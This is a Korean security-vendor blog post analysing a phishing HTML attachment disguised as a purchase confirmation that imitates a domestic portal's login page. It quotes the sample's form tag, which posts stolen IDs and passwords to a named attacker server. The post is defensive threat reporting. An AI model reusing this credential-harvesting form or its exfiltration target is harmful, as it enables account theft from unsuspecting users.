본문 바로가기
악성코드 정보

구매 확인서 관련 피싱 메일 주의! (국내 포털 사이트 ID/PW 탈취)

by AhnLab ASEC 분석팀 2020. 3. 17.

3월 14일, ASEC 분석팀은 '구매확인서 발급 확인요청'으로 위장한 피싱 파일(HTML 형태)이 국내에 유포되는 것을 확인하였다. 피싱(Phishing) 파일을 통해 국내 사용자들이 많이 사용하는 웹 포털 사이트 계정 정보를 입력하도록 하며, 로그인 시 입력한 ID/PW 정보는 공격자에게 전송되는 구조를 갖는다.

 

최근 코로나19 바이러스 관련 파일이나 이력서, 견적서 등으로 유포 중인 악성 코드를 소개한 바 있다. 이 중 대부분의 악성코드는 실행파일 형태로 아이콘과 확장자를 서 파일(.pdf, .hwp)로 속임으로써 사용자의 감염을 유도했다.

 

부당 전자상거래 위반행위 사칭하여 Nemty 2.5 랜섬웨어 유포 중

2020년 1월 6일 ASEC 분석팀은 Nemty 랜섬웨어가 2.5 버전으로 업데이트 되어 국내에 유포된 것을 확인하였다. 이전과 동일하게 공정거래위원회를 사칭하여 이메일 첨부파일 형태로 유포 중으로 추정되며, 첨부된..

asec.ahnlab.com

이번에 접수된 악성 코드는 실행 파일(.EXE)이 아닌 .HTML 스크립트 형식의 파일로 실행 시, 웹 페이지 창을 띄우게 되어 있다. ([그림 1.] 참고)

 

[그림 1.] 악성HTML 스크립트 파일

현재는 "구매확인서 발급 확인요청.pdf.html"이라는 이름으로 유포되고 있으며, 해당 파일을 실행 시 [그림 2.]의 (좌) 화면과 같이 국내 유명 포털 사이트의 로그인 화면을 확인할 수 있다.

 

하지만 해당 파일은 정상적인 사이트가 아닌 공격자가 만든 가짜 사이트로 정상 사이트와 매우 유사한 화면임을 알 수 있다.

 

[그림 2.] (좌) 피싱 사이트 / (우) 정상 사이트

만약, 아이디와 패스워드를 입력하고 로그인 버튼을 누르게 되면, 공격자 서버로 해당 계정 정보가 전송되며 이후에는 정상적인 포털 사이트로 리다이렉트(Redirect)되어 이상함을 알아채기 어렵도록 한다.

 

해당 샘플의 스크립트를 확인 시, 아래와 같은 공격자 서버를 확인할 수 있다.

<form name="loginform" id="loginForm" method="post" action="https://twelve81.com/noted/noted/login.php">

 

일반 사용자들은 출처가 불분명한 이메일 수신시 첨부파일 실행 또는 URL 링크 클릭에 각별한 주의가 필요하다. 현재 V3 제품에서는 이러한 형태의 악성코드를 아래의 진단명으로 탐지하고 있다.

 

  • Phishing/Html.Agent (2020.03.16.05)

댓글0